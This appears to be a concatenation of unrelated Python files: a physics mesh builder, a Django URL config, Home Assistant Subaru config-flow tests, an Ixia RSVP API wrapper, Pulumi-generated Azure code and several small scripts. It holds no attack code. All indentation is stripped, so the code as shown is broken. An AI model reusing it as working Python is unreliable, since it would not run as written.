Nleast = 100
fra = 0.01
Nt = params["Nt"]
T = params["T"]
t0w = params["t0w"]
t0r = params["t0r"]
tauw = params["tauw"]
taur = params["taur"]
if uniform:
return np.linspace(-T/2, T/2, Nt)
# We determine how many points go in each control field region.
Nw = int(fra*Nt); Nr = int(fra*Nt)
if Nw < Nleast: Nw = Nleast
if Nr < Nleast: Nr = Nleast
# The density outside these regions should be uniform.
Trem = T - Nfwhms*tauw - Nfwhms*taur
Nrem = Nt - Nw - Nr
t01 = 0.0; tf1 = t0w-Nfwhms*tauw/2
t02 = t0w+Nfwhms*tauw/2; tf2 = t0r-Nfwhms*taur/2
t03 = t0r+Nfwhms*taur/2; tf3 = T
T1 = tf1 - t01
T2 = tf2 - t02
T3 = tf3 - t03
N1 = int(Nrem*T1/Trem)
N2 = int(Nrem*T2/Trem)
N3 = int(Nrem*T3/Trem)
# We must make sure that these numbers all add up to Nt
Nt_wrong = N1-1 + Nw + N2-2 + Nr + N3-1
# print N1, Nw, N2, Nr, N3
# print Nt, Nt_wrong
# We correct this error:
N2 = N2 + Nt - Nt_wrong
Nt_wrong = N1-1 + Nw + N2-2 + Nr + N3-1
tw = np.linspace(t0w - Nfwhms*tauw/2, t0w + Nfwhms*tauw/2, Nw)
tr = np.linspace(t0r - Nfwhms*taur/2, t0r + Nfwhms*taur/2, Nr)
t1 = np.linspace(t01, tf1, N1)
t2 = np.linspace(t02, tf2, N2)
t3 = np.linspace(t03, tf3, N3)
t = np.zeros(Nt)
t[:N1-1] = t1[:-1]
a1 = 0; b1 = N1-1
aw = b1; bw = aw+Nw
a2 = bw; b2 = a2+N2-2
ar = b2; br = ar+Nr
a3 = br; b3 = a3+N3-1
t[a1:b1] = t1[:-1]
t[aw:bw] = tw
t[a2:b2] = t2[1:-1]
t[ar:br] = tr
t[a3:b3] = t3[1:]
# print t[a1:b1].shape, t[aw:bw].shape, t[a2:b2].shape, t[ar:br].shape,
# print t[a3:b3].shape
if return_bounds:
return (a1, aw, a2, ar, a3)
return t
def build_Z_mesh(params, uniform=True):
r"""Return a Z mesh for a given cell length and number of points."""
L = params["L"]
Nz = params["Nz"]
Z = np.linspace(-L/2, L/2, Nz)
return Z
def build_mesh_fdm(params, verbose=0):
r"""Build mesh for the FDM in the control field region.
We choose a mesh such that the region where the cell overlaps with the
control field has approximately `N**2` points, the time and space
steps satisfy approximately dz/dtau = c/2, and length in time of the mesh
is duration `params["T"]*ntau`.
"""
tauw = params["tauw"]
ntauw = params["ntauw"]
N = params["N"]
Z = build_Z_mesh(params)
D = Z[-1] - Z[0]
# We calculate NtOmega and Nz such that we have approximately
# NtOmega*Nz = N**2
NtOmega = int(round(N*np.sqrt(c*ntauw*tauw/2/D)))
Nz = int(round(N*np.sqrt(2*D/c/ntauw/tauw)))
dt = ntauw*tauw/(NtOmega-1)
# We calculate a t0w that is approximately at 3/2*ntauw*tauw + 2*D/c
Nt1 = int(round((ntauw*tauw + 2*D/c)/dt))+1
t01 = 0.0; tf1 = t01 + (Nt1-1)*dt
t02 = tf1; tf2 = t02 + (NtOmega-1)*dt
t03 = tf2; tf3 = t03 + (Nt1-1)*dt
t0w = (tf2 + t02)/2
t01 -= t0w; tf1 -= t0w
t02 -= t0w; tf2 -= t0w
t03 -= t0w; tf3 -= t0w
t0w = 0.0
tau1 = np.linspace(t01, tf1, Nt1)
tau2 = np.linspace(t02, tf2, NtOmega)
tau3 = np.linspace(t03, tf3, Nt1)
Nt = 2*Nt1 + NtOmega - 2
T = tf3-t01
tau = np.linspace(t01, tf3, Nt)
Z = build_Z_mesh(params)
params_new = params.copy()
params_new["Nt"] = Nt
params_new["Nz"] = Nz
params_new["T"] = T
params_new["t0w"] = t0w
params_new["t0s"] = t0w
Z = build_Z_mesh(params_new)
if verbose > 0:
Nt1 = tau1.shape[0]
Nt2 = tau2.shape[0]
Nt3 = tau3.shape[0]
T1 = tau1[-1] - tau1[0]
T2 = tau2[-1] - tau2[0]
T3 = tau3[-1] - tau3[0]
T1_tar = ntauw*tauw + 2*D/c
# dt1 = tau1[1] - tau1[0]
# dt2 = tau2[1] - tau2[0]
# dt3 = tau3[1] - tau3[0]
aux1 = Nt1+Nt2+Nt3-2
total_size = aux1*Nz
aux2 = [Nt1, Nt2, Nt3, Nz, aux1, Nz, total_size]
mes = "Grid size: ({} + {} + {} - 2) x {} = {} x {} = {} points"
print(mes.format(*aux2))
aux2 = [total_size, 4*total_size**2]
mes = "The W matrix for the full grid would be"
mes += ": (2 x {})^2 = {} points"
print(mes.format(*aux2))
dz = Z[1]-Z[0]
dt = tau[1]-tau[0]
ratio1 = float(NtOmega)/float(Nz)
ratio2 = float(Nz)/float(NtOmega)
mes = "The control field region has {} x {} = {} =? {} = {}^2 points"
print(mes.format(Nt2, Nz, Nt2*Nz, N**2, N))
mes = "The W matrix for the control region would be "
mes += "(2 x {})^2 = {} points"
aux = Nt2*Nz
print(mes.format(aux, 4*aux**2))
mes = "The ratio of steps is (dz/dt)/(c/2) = {:.3f}"
print(mes.format(dz/dt/(c/2)))
aux = [T1/tauw, T2/tauw, T3/tauw]
mes = "T1/tauw, T3/tauw, T3/tauw : {:.3f}, {:.3f}, {:.3f}"
print(mes.format(*aux))
mes = "T1/T1_tar, T3/T1_tar: {:.3f}, {:.3f}"
print(mes.format(T1/T1_tar, T3/T1_tar))
if total_size > 1.3e6:
mes = "The mesh size is larger than 1.3 million, the computer"
mes += " might crash!"
warnings.warn(mes)
if ratio1 > 15:
mes = "There are too many t-points in the control region: {}"
mes = mes.format(NtOmega)
warnings.warn(mes)
if ratio2 > 15:
mes = "There are too many Z-points in the control region, "
mes = "the computer might crash!"
warnings.warn(mes)
if Nz > 500:
mes = "There are too many Z-points! I'll prevent this from "
mes += "crashing."
raise ValueError(mes)
return params_new, Z, tau, tau1, tau2, tau3
|
"""globus URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.conf.urls import handler404, handler500
from django.urls import include, path
urlpatterns = [
path('', include('afisha.urls')),
path('admin/', admin.site.urls),
path('auth/', include('django.contrib.auth.urls')),
path('about/', include('about.urls')),
]
handler404 = 'afisha.views.page_not_found' # noqa
handler500 = 'afisha.views.server_error' # noqa
if settings.DEBUG:
import debug_toolbar
urlpatterns += (path('__debug__/', include(debug_toolbar.urls)),)
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
urlpatterns += static(settings.STATIC_URL,
document_root=settings.STATIC_ROOT)
|
from dataclasses import dataclass
from bindings.csw.simple_literal import SimpleLiteral
__NAMESPACE__ = "http://purl.org/dc/elements/1.1/"
@dataclass
class Description2(SimpleLiteral):
"""An account of the content of the resource.
Examples of Description include, but are not limited to, an
abstract, table of contents, reference to a graphical representation
of content, or free-text account of the content.
"""
class Meta:
name = "description"
namespace = "http://purl.org/dc/elements/1.1/"
|
from time import sleep
from typing import Sequence, Iterator, Callable, TypeVar, Iterable
from typhoon.core import SKIP_BATCH
T = TypeVar('T')
def branch(branches: Sequence[T], delay: int = 0) -> Iterable[T]:
"""
Yields each item in the sequence with an optional delay
:param branches:
:param delay:
:return:
"""
for i, b in enumerate(branches):
if delay and i > 0:
sleep(delay)
yield b
# noinspection PyShadowingBuiltins
def filter(data: T, filter_func: Callable[[T], bool]) -> Iterator:
"""
Send data if the result of applying filter_func on it is True
:param data: Any kind of data
:param filter_func: A function that evaluates data and returns a boolean value
:return:
"""
yield data if filter_func(data) else SKIP_BATCH
|
import pprint
import sys
import os.path
sys.path.append(os.getcwd())
this_dir = os.path.dirname(__file__)
from lib.fast_rcnn.train import get_training_roidb, train_net
from lib.fast_rcnn.config import cfg_from_file, get_output_dir, get_log_dir
from lib.datasets.factory import get_imdb
from lib.networks.factory import get_network
from lib.fast_rcnn.config import cfg
if __name__ == '__main__':
cfg_from_file('ctpn/text.yml')
print('Using config:')
pprint.pprint(cfg)
imdb = get_imdb('voc_2007_trainval')
print('Loaded dataset `{:s}` for training'.format(imdb.name))
roidb = get_training_roidb(imdb)
output_dir = get_output_dir(imdb, None)
log_dir = get_log_dir(imdb)
print('Output will be saved to `{:s}`'.format(output_dir))
print('Logs will be saved to `{:s}`'.format(log_dir))
device_name = '/gpu:0'
print(device_name)
network = get_network('VGGnet_train')
train_net(network, imdb, roidb,
output_dir=output_dir,
log_dir=log_dir,
pretrained_model='data/pretrain/VGG_imagenet.npy',
max_iters=int(cfg.TRAIN.max_steps),
restore=bool(int(cfg.TRAIN.restore)))
|
"""Tests for the Subaru component config flow."""
# pylint: disable=redefined-outer-name
from copy import deepcopy
from unittest import mock
from unittest.mock import patch
import pytest
from subarulink.exceptions import InvalidCredentials, InvalidPIN, SubaruException
from homeassistant import config_entries
from homeassistant.components.subaru import config_flow
from homeassistant.components.subaru.const import CONF_UPDATE_ENABLED, DOMAIN
from homeassistant.const import CONF_DEVICE_ID, CONF_PIN
from homeassistant.setup import async_setup_component
from .conftest import (
MOCK_API_CONNECT,
MOCK_API_IS_PIN_REQUIRED,
MOCK_API_TEST_PIN,
MOCK_API_UPDATE_SAVED_PIN,
TEST_CONFIG,
TEST_CREDS,
TEST_DEVICE_ID,
TEST_PIN,
TEST_USERNAME,
)
from tests.common import MockConfigEntry
ASYNC_SETUP_ENTRY = "homeassistant.components.subaru.async_setup_entry"
async def test_user_form_init(user_form):
"""Test the initial user form for first step of the config flow."""
assert user_form["description_placeholders"] is None
assert user_form["errors"] is None
assert user_form["handler"] == DOMAIN
assert user_form["step_id"] == "user"
assert user_form["type"] == "form"
async def test_user_form_repeat_identifier(hass, user_form):
"""Test we handle repeat identifiers."""
entry = MockConfigEntry(
domain=DOMAIN, title=TEST_USERNAME, data=TEST_CREDS, options=None
)
entry.add_to_hass(hass)
with patch(
MOCK_API_CONNECT,
return_value=True,
) as mock_connect:
result = await hass.config_entries.flow.async_configure(
user_form["flow_id"],
TEST_CREDS,
)
assert len(mock_connect.mock_calls) == 0
assert result["type"] == "abort"
assert result["reason"] == "already_configured"
async def test_user_form_cannot_connect(hass, user_form):
"""Test we handle cannot connect error."""
with patch(
MOCK_API_CONNECT,
side_effect=SubaruException(None),
) as mock_connect:
result = await hass.config_entries.flow.async_configure(
user_form["flow_id"],
TEST_CREDS,
)
assert len(mock_connect.mock_calls) == 1
assert result["type"] == "abort"
assert result["reason"] == "cannot_connect"
async def test_user_form_invalid_auth(hass, user_form):
"""Test we handle invalid auth."""
with patch(
MOCK_API_CONNECT,
side_effect=InvalidCredentials("invalidAccount"),
) as mock_connect:
result = await hass.config_entries.flow.async_configure(
user_form["flow_id"],
TEST_CREDS,
)
assert len(mock_connect.mock_calls) == 1
assert result["type"] == "form"
assert result["errors"] == {"base": "invalid_auth"}
async def test_user_form_pin_not_required(hass, user_form):
"""Test successful login when no PIN is required."""
with patch(MOCK_API_CONNECT, return_value=True,) as mock_connect, patch(
MOCK_API_IS_PIN_REQUIRED,
return_value=False,
) as mock_is_pin_required, patch(
ASYNC_SETUP_ENTRY, return_value=True
) as mock_setup_entry:
result = await hass.config_entries.flow.async_configure(
user_form["flow_id"],
TEST_CREDS,
)
assert len(mock_connect.mock_calls) == 1
assert len(mock_is_pin_required.mock_calls) == 1
assert len(mock_setup_entry.mock_calls) == 1
expected = {
"title": TEST_USERNAME,
"description": None,
"description_placeholders": None,
"flow_id": mock.ANY,
"result": mock.ANY,
"handler": DOMAIN,
"type": "create_entry",
"version": 1,
"data": deepcopy(TEST_CONFIG),
}
expected["data"][CONF_PIN] = None
result["data"][CONF_DEVICE_ID] = TEST_DEVICE_ID
assert result == expected
async def test_pin_form_init(pin_form):
"""Test the pin entry form for second step of the config flow."""
expected = {
"data_schema": config_flow.PIN_SCHEMA,
"description_placeholders": None,
"errors": None,
"flow_id": mock.ANY,
"handler": DOMAIN,
"step_id": "pin",
"type": "form",
"last_step": None,
}
assert pin_form == expected
async def test_pin_form_bad_pin_format(hass, pin_form):
"""Test we handle invalid pin."""
with patch(MOCK_API_TEST_PIN,) as mock_test_pin, patch(
MOCK_API_UPDATE_SAVED_PIN,
return_value=True,
) as mock_update_saved_pin:
result = await hass.config_entries.flow.async_configure(
pin_form["flow_id"], user_input={CONF_PIN: "abcd"}
)
assert len(mock_test_pin.mock_calls) == 0
assert len(mock_update_saved_pin.mock_calls) == 1
assert result["type"] == "form"
assert result["errors"] == {"base": "bad_pin_format"}
async def test_pin_form_success(hass, pin_form):
"""Test successful PIN entry."""
with patch(MOCK_API_TEST_PIN, return_value=True,) as mock_test_pin, patch(
MOCK_API_UPDATE_SAVED_PIN,
return_value=True,
) as mock_update_saved_pin, patch(
ASYNC_SETUP_ENTRY, return_value=True
) as mock_setup_entry:
result = await hass.config_entries.flow.async_configure(
pin_form["flow_id"], user_input={CONF_PIN: TEST_PIN}
)
assert len(mock_test_pin.mock_calls) == 1
assert len(mock_update_saved_pin.mock_calls) == 1
assert len(mock_setup_entry.mock_calls) == 1
expected = {
"title": TEST_USERNAME,
"description": None,
"description_placeholders": None,
"flow_id": mock.ANY,
"result": mock.ANY,
"handler": DOMAIN,
"type": "create_entry",
"version": 1,
"data": TEST_CONFIG,
}
result["data"][CONF_DEVICE_ID] = TEST_DEVICE_ID
assert result == expected
async def test_pin_form_incorrect_pin(hass, pin_form):
"""Test we handle invalid pin."""
with patch(
MOCK_API_TEST_PIN,
side_effect=InvalidPIN("invalidPin"),
) as mock_test_pin, patch(
MOCK_API_UPDATE_SAVED_PIN,
return_value=True,
) as mock_update_saved_pin:
result = await hass.config_entries.flow.async_configure(
pin_form["flow_id"], user_input={CONF_PIN: TEST_PIN}
)
assert len(mock_test_pin.mock_calls) == 1
assert len(mock_update_saved_pin.mock_calls) == 1
assert result["type"] == "form"
assert result["errors"] == {"base": "incorrect_pin"}
async def test_option_flow_form(options_form):
"""Test config flow options form."""
assert options_form["description_placeholders"] is None
assert options_form["errors"] is None
assert options_form["step_id"] == "init"
assert options_form["type"] == "form"
async def test_option_flow(hass, options_form):
"""Test config flow options."""
result = await hass.config_entries.options.async_configure(
options_form["flow_id"],
user_input={
CONF_UPDATE_ENABLED: False,
},
)
assert result["type"] == "create_entry"
assert result["data"] == {
CONF_UPDATE_ENABLED: False,
}
@pytest.fixture
async def user_form(hass):
"""Return initial form for Subaru config flow."""
return await hass.config_entries.flow.async_init(
config_flow.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
@pytest.fixture
async def pin_form(hass, user_form):
"""Return second form (PIN input) for Subaru config flow."""
with patch(MOCK_API_CONNECT, return_value=True,), patch(
MOCK_API_IS_PIN_REQUIRED,
return_value=True,
):
return await hass.config_entries.flow.async_configure(
user_form["flow_id"], user_input=TEST_CREDS
)
@pytest.fixture
async def options_form(hass):
"""Return options form for Subaru config flow."""
entry = MockConfigEntry(domain=DOMAIN, data={}, options=None)
entry.add_to_hass(hass)
await async_setup_component(hass, DOMAIN, {})
return await hass.config_entries.options.async_init(entry.entry_id)
|
"""
Triangle Numbers on Python
git-repository: https://github.com/360macky/seqCodes
author: Marcelo A.S.
"""
print("Triangle Numbers")
# Solicitamos el término
n = int(input("Ingresa el número de términos de la secuencia de números triangulares"))
i = 1
while i < n:
z = (i*(i+1))/2
print(z)
i+=1
|
class UnregisteredExperimentException(Exception):
"""Unregistered Experiment.
Thrown when experiment is not registered in the provided experiment path.
"""
def __init__(self, message, errors=None):
super().__init__(message)
self.errors = errors
class FieldException(Exception):
"""Field Exception.
Thrown when there is an exception relating to experimental fields.
"""
def __init__(self, message, errors=None):
super().__init__(message)
self.errors = errors
class UnregisteredFieldException(FieldException):
"""Unregistered Field.
Thrown when field is not registered in the provided field path.
"""
def __init__(self, message, errors=None):
super().__init__(message)
self.errors = errors
class InvalidExperimentException(Exception):
"""Invalid Experiment Exception.
Thrown when providing experiment data in the incorrect format.
"""
def __init__(self, message, errors=None):
super().__init__(message)
self.errors = errors
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from uhd_restpy.base import Base
from uhd_restpy.files import Files
class RsvpRROSubObjectsList(Base):
"""Rsvp RRO Sub-Objects
The RsvpRROSubObjectsList class encapsulates a list of rsvpRROSubObjectsList resources that are managed by the system.
A list of resources can be retrieved from the server using the RsvpRROSubObjectsList.find() method.
"""
__slots__ = ()
_SDM_NAME = 'rsvpRROSubObjectsList'
_SDM_ATT_MAP = {
'BandwidthProtection': 'bandwidthProtection',
'CType': 'cType',
'Count': 'count',
'DescriptiveName': 'descriptiveName',
'GlobalLabel': 'globalLabel',
'Ip': 'ip',
'Label': 'label',
'LocalIp': 'localIp',
'Name': 'name',
'NodeProtection': 'nodeProtection',
'ProtectionAvailable': 'protectionAvailable',
'ProtectionInUse': 'protectionInUse',
'Type': 'type',
}
def __init__(self, parent):
super(RsvpRROSubObjectsList, self).__init__(parent)
@property
def BandwidthProtection(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Bandwidth Protection
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BandwidthProtection']))
@property
def CType(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): C-Type
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['CType']))
@property
def Count(self):
"""
Returns
-------
- number: Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
"""
return self._get_attribute(self._SDM_ATT_MAP['Count'])
@property
def DescriptiveName(self):
"""
Returns
-------
- str: Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
"""
return self._get_attribute(self._SDM_ATT_MAP['DescriptiveName'])
@property
def GlobalLabel(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Global Label
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['GlobalLabel']))
@property
def Ip(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): IP
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Ip']))
@property
def Label(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Label
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Label']))
@property
def LocalIp(self):
"""
Returns
-------
- list(str): Local IP
"""
return self._get_attribute(self._SDM_ATT_MAP['LocalIp'])
@property
def Name(self):
"""
Returns
-------
- str: Name of NGPF element, guaranteed to be unique in Scenario
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@Name.setter
def Name(self, value):
self._set_attribute(self._SDM_ATT_MAP['Name'], value)
@property
def NodeProtection(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Node Protection
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NodeProtection']))
@property
def ProtectionAvailable(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Protection Available
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ProtectionAvailable']))
@property
def ProtectionInUse(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Protection In Use
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ProtectionInUse']))
@property
def Type(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Reservation Style
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Type']))
def update(self, Name=None):
"""Updates rsvpRROSubObjectsList resource on the server.
This method has some named parameters with a type: obj (Multivalue).
The Multivalue class has documentation that details the possible values for those named parameters.
Args
----
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def find(self, Count=None, DescriptiveName=None, LocalIp=None, Name=None):
"""Finds and retrieves rsvpRROSubObjectsList resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve rsvpRROSubObjectsList resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all rsvpRROSubObjectsList resources from the server.
Args
----
- Count (number): Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
- DescriptiveName (str): Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
- LocalIp (list(str)): Local IP
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
Returns
-------
- self: This instance with matching rsvpRROSubObjectsList resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of rsvpRROSubObjectsList data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the rsvpRROSubObjectsList resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def get_device_ids(self, PortNames=None, BandwidthProtection=None, CType=None, GlobalLabel=None, Ip=None, Label=None, NodeProtection=None, ProtectionAvailable=None, ProtectionInUse=None, Type=None):
"""Base class infrastructure that gets a list of rsvpRROSubObjectsList device ids encapsulated by this object.
Use the optional regex parameters in the method to refine the list of device ids encapsulated by this object.
Args
----
- PortNames (str): optional regex of port names
- BandwidthProtection (str): optional regex of bandwidthProtection
- CType (str): optional regex of cType
- GlobalLabel (str): optional regex of globalLabel
- Ip (str): optional regex of ip
- Label (str): optional regex of label
- NodeProtection (str): optional regex of nodeProtection
- ProtectionAvailable (str): optional regex of protectionAvailable
- ProtectionInUse (str): optional regex of protectionInUse
- Type (str): optional regex of type
Returns
-------
- list(int): A list of device ids that meets the regex criteria provided in the method parameters
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._get_ngpf_device_ids(locals())
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['VirtualNetworkGatewayConnection']
class VirtualNetworkGatewayConnection(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
authorization_key: Optional[pulumi.Input[str]] = None,
connection_protocol: Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayConnectionProtocol']]] = None,
connection_type: Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayConnectionType']]] = None,
dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,
enable_bgp: Optional[pulumi.Input[bool]] = None,
express_route_gateway_bypass: Optional[pulumi.Input[bool]] = None,
id: Optional[pulumi.Input[str]] = None,
ipsec_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['IpsecPolicyArgs']]]]] = None,
local_network_gateway2: Optional[pulumi.Input[pulumi.InputType['LocalNetworkGatewayArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
peer: Optional[pulumi.Input[pulumi.InputType['SubResourceArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
routing_weight: Optional[pulumi.Input[int]] = None,
shared_key: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
traffic_selector_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TrafficSelectorPolicyArgs']]]]] = None,
use_local_azure_ip_address: Optional[pulumi.Input[bool]] = None,
use_policy_based_traffic_selectors: Optional[pulumi.Input[bool]] = None,
virtual_network_gateway1: Optional[pulumi.Input[pulumi.InputType['VirtualNetworkGatewayArgs']]] = None,
virtual_network_gateway2: Optional[pulumi.Input[pulumi.InputType['VirtualNetworkGatewayArgs']]] = None,
virtual_network_gateway_connection_name: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
A common class for general resource information.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] authorization_key: The authorizationKey.
:param pulumi.Input[Union[str, 'VirtualNetworkGatewayConnectionProtocol']] connection_protocol: Connection protocol used for this connection.
:param pulumi.Input[Union[str, 'VirtualNetworkGatewayConnectionType']] connection_type: Gateway connection type.
:param pulumi.Input[int] dpd_timeout_seconds: The dead peer detection timeout of this connection in seconds.
:param pulumi.Input[bool] enable_bgp: EnableBgp flag.
:param pulumi.Input[bool] express_route_gateway_bypass: Bypass ExpressRoute Gateway for data forwarding.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['IpsecPolicyArgs']]]] ipsec_policies: The IPSec Policies to be considered by this connection.
:param pulumi.Input[pulumi.InputType['LocalNetworkGatewayArgs']] local_network_gateway2: The reference to local network gateway resource.
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[pulumi.InputType['SubResourceArgs']] peer: The reference to peerings resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[int] routing_weight: The routing weight.
:param pulumi.Input[str] shared_key: The IPSec shared key.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TrafficSelectorPolicyArgs']]]] traffic_selector_policies: The Traffic Selector Policies to be considered by this connection.
:param pulumi.Input[bool] use_local_azure_ip_address: Use private local Azure IP for the connection.
:param pulumi.Input[bool] use_policy_based_traffic_selectors: Enable policy-based traffic selectors.
:param pulumi.Input[pulumi.InputType['VirtualNetworkGatewayArgs']] virtual_network_gateway1: The reference to virtual network gateway resource.
:param pulumi.Input[pulumi.InputType['VirtualNetworkGatewayArgs']] virtual_network_gateway2: The reference to virtual network gateway resource.
:param pulumi.Input[str] virtual_network_gateway_connection_name: The name of the virtual network gateway connection.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['authorization_key'] = authorization_key
__props__['connection_protocol'] = connection_protocol
if connection_type is None and not opts.urn:
raise TypeError("Missing required property 'connection_type'")
__props__['connection_type'] = connection_type
__props__['dpd_timeout_seconds'] = dpd_timeout_seconds
__props__['enable_bgp'] = enable_bgp
__props__['express_route_gateway_bypass'] = express_route_gateway_bypass
__props__['id'] = id
__props__['ipsec_policies'] = ipsec_policies
__props__['local_network_gateway2'] = local_network_gateway2
__props__['location'] = location
__props__['peer'] = peer
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['routing_weight'] = routing_weight
__props__['shared_key'] = shared_key
__props__['tags'] = tags
__props__['traffic_selector_policies'] = traffic_selector_policies
__props__['use_local_azure_ip_address'] = use_local_azure_ip_address
__props__['use_policy_based_traffic_selectors'] = use_policy_based_traffic_selectors
if virtual_network_gateway1 is None and not opts.urn:
raise TypeError("Missing required property 'virtual_network_gateway1'")
__props__['virtual_network_gateway1'] = virtual_network_gateway1
__props__['virtual_network_gateway2'] = virtual_network_gateway2
__props__['virtual_network_gateway_connection_name'] = virtual_network_gateway_connection_name
__props__['connection_status'] = None
__props__['egress_bytes_transferred'] = None
__props__['etag'] = None
__props__['ingress_bytes_transferred'] = None
__props__['name'] = None
__props__['provisioning_state'] = None
__props__['resource_guid'] = None
__props__['tunnel_connection_status'] = None
__props__['type'] = None
